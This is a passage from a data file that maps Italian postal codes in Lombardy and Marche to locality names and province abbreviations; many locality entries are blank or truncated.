[["Milano", "MI"], ["Rogoredo", "MI"]], "20139": [["Milano", "MI"], ["", "MI"]], "20141": [["Milano", "MI"]], "20142": [["Milano", "MI"], ["Gratosoglio", "MI"]], "20143": [["Barona", "MI"], ["Milano", "MI"]], "20144": [["Milano", "MI"]], "20145": [["Milano", "MI"]], "20146": [["Milano", "MI"]], "20147": [["Milano", "MI"]], "20148": [["Milano", "MI"]], "20149": [["Milano", "MI"]], "20151": [["Milano", "MI"], ["Musocco", "MI"]], "20152": [["Baggio", "MI"], ["Milano", "MI"]], "20153": [["Milano", "MI"], ["Figino", "MI"], ["Trenno", "MI"]], "20154": [["Milano", "MI"]], "20155": [["Milano", "MI"]], "20156": [["Milano", "MI"]], "20157": [["Milano", "MI"], ["Vialba", "MI"], ["", "MI"]], "20158": [["Milano", "MI"]], "20159": [["Milano", "MI"]], "20161": [["Milano", "MI"], ["Bruzzano", "MI"], ["Affori", "MI"]], "20162": [["Niguarda", "MI"], ["Milano", "MI"]], "46010": [ ["", "MN"], ["", "MN"], ["Redondesco", "MN"], ["Belforte", "MN"], ["Grazie", "MN"], ["Curtatone", "MN"], ["", "MN"], ["Cesole", "MN"], ["Gazzuolo", "MN"], ["Campitello", "MN"], ["Montanara", "MN"], ["Commessaggio", "MN"], ["Buscoldo", "MN"], ["", "MN"], ["Casatico", "MN"], ["Canicossa", "MN"], ["Gabbiana", "MN"], ["Ospitaletto", "MN"], ["Levata", "MN"], ["Marcaria", "MN"], ["", "MN"], ], "46011": [["", "MN"], ["Mosio", "MN"]], "46012": [["Bozzolo", "MN"]], "46013": [["", "MN"]], "46014": [["Sarginesco", "MN"], ["", "MN"], ["Castellucchio", "MN"]], "46017": [["", "MN"], ["", "MN"]], "46018": [["", "MN"], ["Ponteterra", "MN"], ["", "MN"], ["Sabbioneta", "MN"]], "46019": [ ["Cogozzo", "MN"], ["Cicognara", "MN"], ["", "MN"], ["Buzzoletto", "MN"], ["Viadana", "MN"], ["Cizzolo", "MN"], ["Bellaguarda", "MN"], ], "46020": [ ["Polesine", "MN"], ["", "MN"], ["", "MN"], ["Magnacavallo", "MN"], ["Motteggiana", "MN"], ["", "MN"], ["", "MN"], ["", "MN"], ["Quingentole", "MN"], ["Schivenoglia", "MN"], ["Pegognaga", "MN"], ], "46021": [["", "MN"], ["", "MN"]], "46022": [["Felonica", "MN"]], "46023": [["", "MN"], ["Palidano", "MN"], ["Gonzaga", "MN"]], "46024": [["Bondanello", "MN"], ["Moglia", "MN"]], "46025": [["", "MN"]], "46026": [["Quistello", "MN"], ["Nuvolato", "MN"]], "46027": [["Portiolo", "MN"], ["San Benedetto Po", "MN"], ["Mirasole", "MN"], ["San Siro", "MN"]], "46028": [ ["", "MN"], ["Sermide", "MN"], ["Caposotto", "MN"], ["", "MN"], ["Malcantone", "MN"], ], "46029": [ ["Sailetto", "MN"], ["Tabellano", "MN"], ["Riva", "MN"], ["Brusatasso", "MN"], ["Suzzara", "MN"], ["San Prospero", "MN"], ], "46030": [ ["Gazzo", "MN"], ["Dosolo", "MN"], ["Correggioverde", "MN"], ["Mottella", "MN"], ["Stradella", "MN"], ["Tripoli", "MN"], ["Sacchetta", "MN"], ["", "MN"], ["Pomponesco", "MN"], ["Sustinente", "MN"], ["Villastrada", "MN"], ["", "MN"], ["", "MN"], ["Libiola", "MN"], ], "46031": [["San Nicolo' Po", "MN"], ["San Biagio", "MN"], ["Bagnolo San Vito", "MN"]], "46032": [["Castelbelforte", "MN"]], "46033": [["", "MN"]], "46034": [ ["Boccadiganda", "MN"], ["", "MN"], ["Borgoforte", "MN"], ["Cerese", "MN"], ["Virgilio", "MN"], ["Romanore", "MN"], ["Pietole", "MN"], ["", "MN"], ["Cappelletta", "MN"], ], "46035": [["Ostiglia", "MN"], ["Correggioli", "MN"]], "46036": [["Revere", "MN"]], "46037": [ ["Casale", "MN"], ["Barbasso", "MN"], ["Roncoferraro", "MN"], ["", "MN"], ["Pontemerlano", "MN"], ["", "MN"], ["Governolo", "MN"], ], "46039": [["Villimpenta", "MN"]], "46040": [ ["", "MN"], ["", "MN"], ["", "MN"], ["Ceresara", "MN"], ["", "MN"], ["Rivalta", "MN"], ["Casalromano", "MN"], ["", "MN"], ["Rodigo", "MN"], ["Monzambano", "MN"], ["Guidizzolo", "MN"], ["Cavriana", "MN"], ["Solferino", "MN"], ["Casalmoro", "MN"], ["Piubega", "MN"], ["Casaloldo", "MN"], ], "46041": [["Castelnuovo Asolano", "MN"], ["Asola", "MN"], ["Castelnuovo", "MN"], ["", "MN"]], "46042": [["", "MN"]], "46043": [["Gozzolina", "MN"], ["", "MN"]], "46044": [["Goito", "MN"], ["Cerlongo", "MN"], ["Solarolo", "MN"]], "46045": [["Pozzolo", "MN"], ["Marengo", "MN"], ["Marmirolo", "MN"]], "46046": [["Medole", "MN"]], "46047": [["Soave", "MN"], ["", "MN"], ["Sant'Antonio", "MN"], ["", "MN"]], "46048": [ ["Roverbella", "MN"], ["Malavicina", "MN"], ["", "MN"], ["Canedole", "MN"], ["Pellaloco", "MN"], ], "46049": [["Cereta", "MN"], ["", "MN"]], "46051": [["Bigarello", "MN"], ["", "MN"]], "46100": [ ["", "MN"], ["Lunetta", "MN"], ["Mantova", "MN"], ["Borgovirgiliana", "MN"], ["Formigosa", "MN"], ], "27010": [ ["Gerenzago", "PV"], ["Borgarello", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Giovenzano", "PV"], ["Roncaro", "PV"], ["", "PV"], ["Albuzzano", "PV"], ["Camporinaldo", "PV"], ["", "PV"], ["Giussago", "PV"], ["Zeccone", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Rognano", "PV"], ["Bornasco", "PV"], ["", "PV"], ["Marzano", "PV"], ["Copiano", "PV"], ["", "PV"], ["Vistarino", "PV"], ["Spessa", "PV"], ["Vigonzone", "PV"], ["Inverno", "PV"], ["Bascape'", "PV"], ["", "PV"], ["", "PV"], ["Siziano", "PV"], ["Ceranova", "PV"], ["Linarolo", "PV"], ["Magherno", "PV"], ["Monteleone", "PV"], ["Guinzano", "PV"], ["Filighera", "PV"], ["", "PV"], ["", "PV"], ], "27011": [["Belgioioso", "PV"], ["", "PV"]], "27012": [["Torriano", "PV"], ["", "PV"], ["", "PV"]], "27013": [["Lambrinia", "PV"], ["", "PV"]], "27014": [["Genzone", "PV"], ["Corteolona", "PV"]], "27015": [["Landriano", "PV"]], "27016": [["Lardirago", "PV"], ["", "PV"]], "27017": [["Zerbo", "PV"], ["", "PV"]], "27018": [["Vidigulfo", "PV"]], "27019": [["Villanterio", "PV"]], "27020": [ ["", "PV"], ["Semiana", "PV"], ["Trivolzio", "PV"], ["Zerbolo'", "PV"], ["Marcignago", "PV"], ["Massaua", "PV"], ["Dorno", "PV"], ["Alagna", "PV"], ["", "PV"], ["Cergnago", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Velellina", "PV"], ["Casottole", "PV"], ["Rotta", "PV"], ["Tromello", "PV"], ["Battuda", "PV"], ["Albonese", "PV"], ["Valeggio", "PV"], ["Parona", "PV"], ["", "PV"], ["Breme", "PV"], ["Nicorvo", "PV"], ["Trovo", "PV"], ["Scaldasole", "PV"], ], "27021": [["Bereguardo", "PV"]], "27022": [["Casorate Primo", "PV"]], "27023": [["Cassolnovo", "PV"]], "27024": [["Cilavegna", "PV"]], "27025": [["Gambolo'", "PV"]], "27026": [["", "PV"], ["Garlasco", "PV"], ["", "PV"]], "27027": [["", "PV"]], "27028": [["", "PV"], ["", "PV"]], "27029": [["Vigevano", "PV"], ["Sforzesca", "PV"]], "27030": [ ["", "PV"], ["Ottobiano", "PV"], ["Frascarolo", "PV"], ["Langosco", "PV"], ["", "PV"], ["Zeme", "PV"], ["Confienza", "PV"], ["Zinasco", "PV"], ["Rosasco", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Castelnovetto", "PV"], ["", "PV"], ["", "PV"], ["Gambarana", "PV"], ["Suardi", "PV"], ["Cozzo", "PV"], ["Sairano", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Palestro", "PV"], ], "27031": [["", "PV"]], "27032": [["", "PV"]], "27033": [["Garbana", "PV"]], "27034": [["Galliavola", "PV"], ["Lomello", "PV"]], "27035": [["", "PV"], ["Mede", "PV"]], "27036": [["Mortara", "PV"]], "27037": [["", "PV"]], "27038": [["Robbio", "PV"]], "27039": [["", "PV"]], "27040": [ ["Mezzanino", "PV"], ["Bosnasco", "PV"], ["Casatisma", "PV"], ["", "PV"], ["Arena Po", "PV"], ["", "PV"], ["Vallescuropasso", "PV"], ["Rea", "PV"], ["Castana", "PV"], ["", "PV"], ["Montu' Beccaria", "PV"], ["Tornello", "PV"], ["", "PV"], ["Rovescala", "PV"], ["", "PV"], ["Castelletto Po", "PV"], ["", "PV"], ["Portalbera", "PV"], ["", "PV"], ["Casenove", "PV"], ["", "PV"], ["", "PV"], ["Mornico", "PV"], ["Montescano", "PV"], ["Fortunago", "PV"], ["Pometo", "PV"], ["", "PV"], ["Lirio", "PV"], ["", "PV"], ["Campospinoso", "PV"], ["Busca", "PV"], ["", "PV"], ["Calvignano", "PV"], ["Cigognola", "PV"], ], "27041": [["Barbianello", "PV"], ["", "PV"]], "27042": [["", "PV"], ["B", "PV"], ["Bressana", "PV"], ["Bottarone", "PV"]], "27043": [["Broni", "PV"], ["San Cipriano Po", "PV"]], "27044": [["", "PV"], ["Canneto", "PV"]], "27045": [["Casteggio", "PV"]], "27046": [["Santa Giuletta", "PV"]], "27047": [ ["", "PV"], ["Montec", "PV"], ["Golferenzo", "PV"], ["Volpara", "PV"], ], "27048": [["Sommo", "PV"]], "27049": [["Zenevredo", "PV"], ["Stradella", "PV"]], "27050": [ ["Casei", "PV"], ["", "PV"], ["", "PV"], ["", "PV"], ["Pancarana", "PV"], ["", "PV"], ["Corana", "PV"], ["Cervesina", "PV"], ["", "PV"], ["Collegio", "PV"], ["Codevilla", "PV"], ["Romagnese", "PV"], ["Pizzale", "PV"], ["Ghiaie", "PV"], ["", "PV"], ["Retorbido", "PV"], ["", "PV"], ["", "PV"], ["Cecima", "PV"], ["", "PV"], ["Fumo", "PV"], ["", "PV"], ["Redavalle", "PV"], ["", "PV"], ["Menconico", "PV"], ["Bagnaria", "PV"], ["", "PV"], ], "27051": [["", "PV"], ["", "PV"], ["", "PV"]], "27052": [["Montesegale", "PV"], ["Godiasco", "PV"], ["", "PV"], ["", "PV"]], "27053": [["Verretto", "PV"], ["Lungavilla", "PV"]], "27054": [["", "PV"]], "27055": [["Rivanazzano", "PV"]], "27056": [["", "PV"], ["", "PV"], ["Cornale", "PV"]], "27057": [["Pietragavina", "PV"], ["Varzi", "PV"]], "27058": [["Oriolo", "PV"], ["Voghera", "PV"]], "27059": [["Zavattarello", "PV"]], "27061": [["Ruino", "PV"], ["Canevino", "PV"]], "27100": [["", "PV"], ["Ca' ", "PV"], ["Pavia", "PV"], ["Fossarmato", "PV"]], "23010": [ ["Cedrasco", "SO"], ["Rogolo", "SO"], ["Mello", "SO"], ["", "SO"], ["Dazio", "SO"], ["Fusine", "SO"], ["Piantedo", "SO"], ["Rasura", "SO"], ["Civo", "SO"], ["Cevo", "SO"], ["", "SO"], ["Albosaggia", "SO"], [" Val Masino", "SO"], ["", "SO"], ["Cino", "SO"], ["", "SO"], ["Cataeggio", "SO"], ["Pedesina", "SO"], ["", "SO"], ["Pedemonte", "SO"], ["Colorina", "SO"], ["", "SO"], ["", "SO"], ["Tartano", "SO"], ["Villapinta", "SO"], ["Sirta", "SO"], ["", "SO"], ["Bema", "SO"], ["Torchione", "SO"], ["", "SO"], ["Moia", "SO"], ["Forcola", "SO"], ["Caiolo", "SO"], ["Postalesio", "SO"], ], "23011": [["Ardenno", "SO"]], "23012": [["", "SO"]], "23013": [["Regoledo", "SO"], ["Sacco", "SO"], ["", "SO"], ["", "SO"]], "23014": [["", "SO"], ["Delebio", "SO"]], "23015": [["Dubino", "SO"], ["", "SO"]], "23016": [["Cercino", "SO"], ["Mantello", "SO"]], "23017": [["Campovico", "SO"], ["Morbegno", "SO"]], "23018": [["Talamona", "SO"]], "23019": [["Traona", "SO"]], "23020": [ ["Caspoggio", "SO"], ["Verceia", "SO"], ["Gordona", "SO"], ["Prasomaso", "SO"], ["Boffetto", "SO"], ["", "SO"], ["Mese", "SO"], ["", "SO"], ["Piuro", "SO"], ["", "SO"], ["Menarola", "SO"], ["Piateda", "SO"], ["Tresivio", "SO"], ["Lirone", "SO"], ["Poggiridenti", "SO"], ["Spriana", "SO"], ["Lanzada", "SO"], ["", "SO"], ["", "SO"], ["", "SO"], ["", "SO"], ["Santa Croce", "SO"], ["Prosto", "SO"], ["", "SO"], ["Santa Croce Di Piuro", "SO"], ], "23021": [["Campodolcino", "SO"], ["Fraciscio", "SO"]], "23022": [["Bette", "SO"], ["Chiavenna", "SO"]], "23023": [["Primolo", "SO"], ["Chiareggio", "SO"], [" Valmalenco", "SO"]], "23024": [["Isola", "SO"], ["Pianazzo", "SO"], ["Madesimo", "SO"], ["Montespluga", "SO"]], "23025": [["Novola", "SO"], ["Campo", "SO"]], "23026": [["Ponte In Valtellina", "SO"], ["Arigna", "SO"]], "23027": [ ["San P", "SO"], ["Somaggia", "SO"], ["Era", "SO"], ["Era Samolaco", "SO"], ["San Pietro", "SO"], ["Samolaco", "SO"], ], "23029": [["", "SO"], ["Dogana", "SO"], ["", "SO"]], "23030": [ ["", "SO"], ["", "SO"], ["Piatta", "SO"], ["Livigno", "SO"], ["' Di Valfurva", "SO"], ["Trepalle", "SO"], ["Valfurva", "SO"], ["", "SO"], ["Stazzona", "SO"], ["", "SO"], ["", "SO"], ["Valdisotto", "SO"], ["Santa Caterina", "SO"], ["Sant'Antonio", "SO"], ["Lovero", "SO"], ["Castionetto", "SO"], ["Santa ", "SO"], ["Sernio", "SO"], ["Bianzone", "SO"], ["Cepina", "SO"], ["Chiuro", "SO"], ["Vervio", "SO"], ], "23031": [["Aprica", "SO"]], "23032": [["", "SO"], ["Bormio", "SO"]], "23033": [["Tiolo", "SO"], ["Ravoledo", "SO"], ["Grosio", "SO"]], "23034": [["Grosotto", "SO"]], "23035": [ ["", "SO"], ["Frontale", "SO"], ["", "SO"], ["", "SO"], ["Sondalo", "SO"], ["Mondadizza", "SO"], ["", "SO"], ["Le Prese", "SO"], ["Pendosso", "SO"], ], "23036": [["Teglio", "SO"], ["", "SO"], ["", "SO"], ["Tresenda", "SO"]], "23037": [["", "SO"], ["Tirano", "SO"]], "23038": [ ["Isolaccia", "SO"], ["Semogo", "SO"], ["", "SO"], ["", "SO"], ["Valdidentro", "SO"], ], "23100": [ ["Ponchiera", "SO"], ["Sant'Anna", "SO"], ["Albosaggia", "SO"], ["Mossini", "SO"], ["Sondrio", "SO"], ["Faedo", "SO"], ["Triangia", "SO"], ], "21010": [ ["", "VA"], ["", "VA"], ["Muceno", "VA"], ["Calde'", "VA"], ["", "VA"], ["Nasca", "VA"], ["Castelveccana", "VA"], ["Domo", "VA"], ["Germignaga", "VA"], ["Castello", "VA"], ["", "VA"], ["Ligurno", "VA"], ["", "VA"], ["", "VA"], ["", "VA"], ["Golasecca", "VA"], ["", "VA"], ["Ferno", "VA"], ["Besnate", "VA"], ["Dumenza", "VA"], ["Veddasca", "VA"], ["", "VA"], ["Agra", "VA"], ["", "VA"], ["", "VA"], ], "21011": [["", "VA"]], "21012": [["", "VA"]], "21013": [["Gallarate", "VA"], ["Crenna", "VA"], ["Cedrate", "VA"]], "21014": [["", "VA"], ["Mombello", "VA"], ["Laveno", "VA"]], "21015": [["", "VA"], ["Tornavento", "VA"], ["", "VA"]], "21016": [["Voldomino", "VA"], ["Poppino", "VA"], ["Creva", "VA"], ["Luino", "VA"]], "21017": [["", "VA"], ["Verghera", "VA"], ["", "VA"], ["Samarate", "VA"]], "21018": [["", "VA"], ["Lisanza", "VA"]], "21019": [ ["", "VA"], ["", "VA"], ["Coarezza", "VA"], ["Maddalena", "VA"], ["Case Nuove", "VA"], ], "21020": [ ["Villadosia", "VA"], ["Barasso", "VA"], ["Montonate", "VA"], ["", "VA"], ["Taino", "VA"], ["Ternate", "VA"], ["Bregano", "VA"], ["Daverio", "VA"], ["Inarzo", "VA"], ["", "VA"], ["Bodio", "VA"], ["", "VA"], ["Mornago", "VA"], ["Buguggiate", "VA"], ["", "VA"], ["Ranco", "VA"], ["", "VA"], ["", "VA"], ["Comabbio", "VA"], ["Mercallo", "VA"], ["Brebbia", "VA"], ["Crugnola", "VA"], ["Monvalle", "VA"], ["Malgesso", "VA"], ["Luvinate", "VA"], ["Lomnago", "VA"], ["Bernate", "VA"], ["Bardello", "VA"], ["Brunello", "VA"], ["Casciago", "VA"], ], "21021": [["Angera", "VA"]], "21022": [["Azzate", "VA"]], "21023": [["Besozzo", "VA"]], "21024": [["Biandronno", "VA"]], "21025": [["Comerio", "VA"]], "21026": [["", "VA"], ["Gavirate", "VA"]], "21027": [["Ispra", "VA"], ["Ispra Centro Euratom", "VA"], ["Barza", "VA"]], "21028": [["Travedona Monate", "VA"]], "21029": [["Cimbro", "VA"], ["Cuirone", "VA"], ["Corgeno", "VA"], ["Vergiate", "VA"]], "21030": [ ["", "VA"], ["Brenta", "VA"], ["Cugliate", "VA"], ["", "VA"], ["Mesenzana", "VA"], ["Brinzio", "VA"], ["", "VA"], ["", "VA"], ["", "VA"], ["Fabiasco", "VA"], ["Marchirolo", "VA"], ["Azzio", "VA"], ["Orino", "VA"], ["Marzio", "VA"], ["Duno", "VA"], ["Casalzuigno", "VA"], ["Grantola", "VA"], ["Cremenaga", "VA"], ["", "VA"], ["Cuveglio", "VA"], ["Cuvio", "VA"], ["", "VA"], ], "21031": [["", "VA"], ["Viconago", "VA"], ["Cadegliano", "VA"]], "21032": [["Caravate", "VA"]], "21033": [["Cittiglio", "VA"]], "21034": [["Caldana", "VA"], ["Trevisago", "VA"], ["", "VA"], ["Cocquio", "VA"]], "21035": [["Cunardo", "VA"]], "21036": [["Gemonio", "VA"]], "21037": [["", "VA"], ["", "VA"]], "21038": [["Leggiuno", "VA"], ["Sangiano", "VA"]], "21039": [["", "VA"], ["Valganna", "VA"], ["Ganna", "VA"], ["Ghirla", "VA"]], "21040": [ ["", "VA"], ["", "VA"], ["Venegono Superiore", "VA"], ["", "VA"], ["", "VA"], ["Castronno", "VA"], ["Oggiona", "VA"], ["Morazzone", "VA"], ["Cislago", "VA"], ["", "VA"], ["Origgio", "VA"], ["", "VA"], ["", "VA"], ["Sumirago", "VA"], ["Uboldo", "VA"], ["Massina", "VA"], ["Carnago", "VA"], ["Lozza", "VA"], ["Rovate", "VA"], ["Venegono Inferiore", "VA"], ["Gerenzano", "VA"], ], "21041": [["Albizzate", "VA"]], "21042": [["", "VA"]], "21043": [["", "VA"], ["", "VA"]], "21044": [["", "VA"]], "21045": [["Schianno", "VA"], ["Gazzada", "VA"], ["", "VA"]], "21046": [["Malnate", "VA"], ["San Salvatore", "VA"]], "21047": [["Saronno", "VA"]], "21048": [["", "VA"], ["Monte", "VA"]], "21049": [["", "VA"], ["Tradate", "VA"]], "21050": [ ["Marnate", "VA"], ["Brusimpiano", "VA"], ["", "VA"], ["", "VA"], ["Besano", "VA"], ["Bolladello", "VA"], ["", "VA"], ["", "VA"], ["Clivio", "VA"], ["Cairate", "VA"], ["Saltrio", "VA"], ["", "VA"], ["Gaggiolo", "VA"], ["Bisuschio", "VA"], ["Cavagnano", "VA"], ["Castelseprio", "VA"], ["Cantello", "VA"], ], "21051": [["", "VA"], ["Arcisate", "VA"]], "21052": [["Sacconago", "VA"], ["Borsano", "VA"], ["", "VA"]], "21053": [["Castellanza", "VA"]], "21054": [["", "VA"], ["Bergoro", "VA"]], "21055": [["", "VA"]], "21056": [["", "VA"]], "21057": [["'", "VA"], ["Olgiate Olona", "VA"]], "21058": [["Solbiate Olona", "VA"]], "21059": [["Baraggia", "VA"], ["Viggiu'", "VA"]], "21061": [["Maccagno Con Pino E Veddasca", "VA"], ["Maccagno", "VA"]], "21062": [["Osmate", "VA"], ["Cadrezzate", "VA"]], "21100": [ ["Rasa", "VA"], ["Rasa Di Velate", "VA"], ["Cartabbia", "VA"], ["", "VA"], ["", "VA"], ["Bizzozero", "VA"], ["", "VA"], ["", "VA"], ["Varese", "VA"], ["Capolago", "VA"], ["Masnago", "VA"], ["Casbeno", "VA"], ], "60010": [ ["Ostra", "AN"], ["", "AN"], ["Vaccarile", "AN"], ["Barbara", "AN"], ["Casine", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Pianello", "AN"], ], "60011": [ ["", "AN"], ["", "AN"], ["Arcevia", "AN"], ["Nidastore", "AN"], ["Piticchio", "AN"], ["Palazzo", "AN"], ["", "AN"], ["Avacelli", "AN"], ["Castiglioni", "AN"], ["Montefortino", "AN"], ], "60012": [ ["", "AN"], ["Ripe", "AN"], ["Monterado", "AN"], ["Brugnetto", "AN"], ["Trecastelli", "AN"], ["", "AN"], ["", "AN"], ], "60013": [["Corinaldo", "AN"]], "60015": [["Castelferretti", "AN"], ["", "AN"], ["", "AN"]], "60018": [["", "AN"], ["Lungomare", "AN"], ["Montemarciano", "AN"]], "60019": [ ["", "AN"], ["", "AN"], ["Montignano", "AN"], ["Marzocca", "AN"], ["Sant'Angelo", "AN"], ["Vallone", "AN"], ["Roncitelli", "AN"], ["", "AN"], ["Senigallia", "AN"], ["Scapezzano", "AN"], ], "60020": [ ["Sirolo", "AN"], ["Agugliano", "AN"], ["Offagna", "AN"], ["Polverigi", "AN"], ["", "AN"], ["", "AN"], ], "60021": [["Camerano", "AN"], ["", "AN"]], "60022": [["", "AN"], ["", "AN"], ["Castelfidardo", "AN"]], "60024": [["Montoro", "AN"], ["Filottrano", "AN"]], "60025": [["", "AN"], ["L", "AN"], ["Loreto", "AN"]], "60026": [["Numana", "AN"], ["Marcelli", "AN"], ["", "AN"]], "60027": [ ["Passatempo", "AN"], ["", "AN"], ["Casenuove", "AN"], ["Padiglione", "AN"], ["Campocavallo", "AN"], ["Osimo", "AN"], ["", "AN"], ["San Biagio", "AN"], ], "60030": [ ["", "AN"], ["", "AN"], ["Mergo", "AN"], ["Monsano", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Rosora", "AN"], ["Angeli", "AN"], ["", "AN"], ["Castelbellino", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Stazione", "AN"], ["Osteria", "AN"], ["", "AN"], ["", "AN"], ["", "AN"], ["Moie", "AN"], ], "60031": [["Castelplanio", "AN"], ["", "AN"], ["Macine", "AN"], ["", "AN"]], "60033": [["Chiaravalle", "AN"], ["Grancetta", "AN"]], "60034": [["Cupramontana", "AN"]], "60035": [["Jesi", "AN"]], "60036": [["Montecarotto", "AN"]], "60037": [["", "AN"], ["Borghetto", "AN"], ["", "AN"]], "60038": [["", "AN"]], "60039": [["Staffolo", "AN"]], "60040": [ ["Trinquelli", "AN"], ["", "AN"], ["Colleponi", "AN"], ["", "AN"], ["Genga", "AN"], ], "60041": [ ["Cabernardi", "AN"], ["", "AN"], ["Monterosso Stazione", "AN"], ["Sassoferrato", "AN"], ["Monterosso", "AN"], ["Perticano", "AN"], ["", "AN"], ], "60043": [["", "AN"]], "60044": [ ["Sant'Elia", "AN"], ["Castelletta", "AN"], ["Serradica", "AN"], ["Melano", "AN"], ["", "AN"], ["Fabriano", "AN"], ["Attiggio", "AN"], ["Nebbiano", "AN"], ["", "AN"], ["", "AN"], ["Marischio", "AN"], ["", "AN"], ["Campodonico", "AN"], ["Albacina", "AN"], ["Argignano", "AN"], ["Cancelli", "AN"], ["Collamato", "AN"], ["", "AN"], ], "60048": [ ["Castellaro", "AN"], ["Serra San Quirico Stazione", "AN"], ["Domo", "AN"], ["Serra San Quirico", "AN"], ["Sasso", "AN"], ], "60100": [["Ancona", "AN"]], "60121": [["Ancona", "AN"]], "60122": [["Ancona", "AN"]], "60123": [["Ancona", "AN"]], "60124": [["Ancona", "AN"]], "60125": [["Ancona", "AN"]], "60126": [["Ancona", "AN"]], "60127": [["Ancona", "AN"], ["Pinocchio", "AN"]], "60128": [["Ancona", "AN"]], "60129": [["Ancona", "AN"], ["Varano", "AN"], ["Pietralacroce", "AN"], ["Poggio", "AN"]], "60131": [["Ancona", "AN"], ["Montesicuro", "AN"]], "63020": [["", "AP"]], "63031": [["", "AP"]], "63061": [["Massignano", "AP"]], "63062": [["", "AP"]], "63063": [["Carassai", "AP"]], "63064": [["", "AP"]], "63065": [["", "AP"], ["Ripatransone", "AP"]], "63066": [["Ischia", "AP"], ["Grottammare", "AP"]], "63067": [["Cossignano", "AP"]], "63068": [["Porchia", "AP"], ["Patrignone", "AP"], ["", "AP"]], "63069": [["Montedinove", "AP"]], "63071": [["Rotella", "AP"], ["", "AP"]], "63072": [["Castignano", "AP"], ["Ripaberarda", "AP"]], "63073": [["Offida", "AP"]], "63074": [["San Benedetto Del Tronto", "AP"], ["", "AP"]], "63075": [["", "AP"]], "63076": [["Centobuchi", "AP"], ["Monteprandone", "AP"]], "63077": [["", "AP"], ["", "AP"]], "63078": [["Pagliare", "AP"], ["Spinetoli", "AP"]], "63079": [["", "AP"], ["", "AP"]], "63081": [["Castorano", "AP"], ["", "AP"]], "63082": [ ["", "AP"], ["", "AP"], ["Piattoni", "AP"], ["", "AP"], ], "63083": [["", "AP"]], "63084": [["Folignano", "AP"], ["", "AP"], ["", "AP"], ["", "AP"]], "63085": [["Caselle", "AP"], ["Maltignano", "AP"]], "63086": [["Force", "AP"]], "63087": [["Comunanza", "AP"], ["", "AP"]], "63088": [["Montemonaco", "AP"]], "63091": [["Venarotta", "AP"]], "63092": [["Palmiano", "AP"]], "63093": [["Roccafluvione", "AP"], ["Marsia", "AP"], ["Agelli", "AP"]], "63094": [["Montegallo", "AP"], ["Bisignano", "AP"]], "63095": [ ["Quintodecimo", "AP"], ["", "AP"], ["Paggese", "AP"], ["", "AP"], ["", "AP"], ["", "AP"], ["Tallacano", "AP"], ], "63096": [ ["Pretare", "AP"], ["Spelonga", "AP"], ["Pescara Del Tronto", "AP"], ["Trisungo", "AP"], ["Arquata Del Tronto", "AP"], ["Capodacqua", "AP"], ], "63100": [ ["", "AP"], ["", "AP"], ["Piagge", "AP"], ["Venagrande", "AP"], ["Mozzano", "AP"], ["Lisciano", "AP"], ["", "AP"], ["Monticelli", "AP"], ["", "AP"], ["Campolungo", "AP"], ["", "AP"], ["", "AP"], ], "63811": [ ["Castellano", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["Cretarola", "FM"], ["Cascinare", "FM"], ], "63812": [["Montegranaro", "FM"]], "63813": [["", "FM"]], "63814": [["", "FM"]], "63815": [["", "FM"]], "63816": [["", "FM"]], "63821": [["", "FM"]], "63822": [["", "FM"]], "63823": [["Lapedona", "FM"]], "63824": [["", "FM"], ["Altidona", "FM"]], "63825": [["Rubbianello", "FM"], ["Monterubbiano", "FM"]], "63826": [["Moresco", "FM"]], "63827": [["Pedaso", "FM"]], "63828": [["Campofilone", "FM"]], "63831": [["", "FM"], ["Rapagnano", "FM"]], "63832": [["", "FM"]], "63833": [["Montegiorgio", "FM"], ["", "FM"], ["Alteta", "FM"]], "63834": [["", "FM"]], "63835": [["Montappone", "FM"]], "63836": [["", "FM"]], "63837": [["Falerone", "FM"], ["Piane", "FM"]], "63838": [["", "FM"]], "63839": [["Curetta", "FM"], ["Servigliano", "FM"]], "63841": [["", "FM"]], "63842": [["", "FM"], ["", "FM"]], "63843": [["Montottone", "FM"]], "63844": [["Grottazzolina", "FM"]], "63845": [["Capparuccia", "FM"], ["", "FM"], ["Torchiaro", "FM"]], "63846": [["", "FM"]], "63847": [["", "FM"]], "63848": [["Moregnano", "FM"], ["Petritoli", "FM"]], "63851": [["Ortezzano", "FM"]], "63852": [["", "FM"]], "63853": [["Montelparo", "FM"]], "63854": [["Santa Vittoria In Matenano", "FM"]], "63855": [["", "FM"]], "63856": [["", "FM"], ["Smerillo", "FM"]], "63857": [["Amandola", "FM"]], "63858": [["Santa Lucia In Consilvano", "FM"], ["Montefortino", "FM"]], "63900": [ ["Salvano", "FM"], ["", "FM"], ["Campiglione", "FM"], ["", "FM"], ["Capodarco", "FM"], ["Caldarette", "FM"], ["Fermo", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ["", "FM"], ], "62010": [ ["Trodica", "MC"], ["Morrovalle", "MC"], ["Montefano", "MC"], ["Appignano", "MC"], ["Sant'Egidio", "MC"], ["", "MC"], ["", "MC"], ["", "MC"], ["Montecassiano", "MC"], ["Urbisaglia", "MC"], ["", "MC"], ["Pollenza", "MC"], ["Mogliano", "MC"], ["", "MC"], ["Sambucheto", "MC"], ["Montecosaro", "MC"], ["Pintura", "MC"], ["Santa Maria In Selva", "MC"], ["", "MC"], ["Chiesanuova", "MC"], ["Treia", "MC"], ["Montelupone", "MC"], ], "62011": [ ["", "MC"], ["Moscosi", "MC"], ["Avenale", "MC"], ["Troviggiano", "MC"], ["", "MC"], ["", "MC"], ["Torre", "MC"], ["Strada", "MC"], ["Cingoli", "MC"], ["Grottaccia", "MC"], ], "62012": [ ["Fontespina", "MC"], ["Civitanova Alta", "MC"], ["Civitanova Marche Alta", "MC"], ["Civitanova Marche", "MC"], ["", "MC"], ], "62014": [ ["Corridonia", "MC"], ["Petriolo", "MC"], ["", "MC"], ["", "MC"], ["Colbuccaro", "MC"], ], "62015": [["", "MC"], ["", "MC"]], "62017": [["Port", "MC"]], "62018": [["Potenza Picena", "MC"], ["Porto Potenza Picena", "MC"]], "62019": 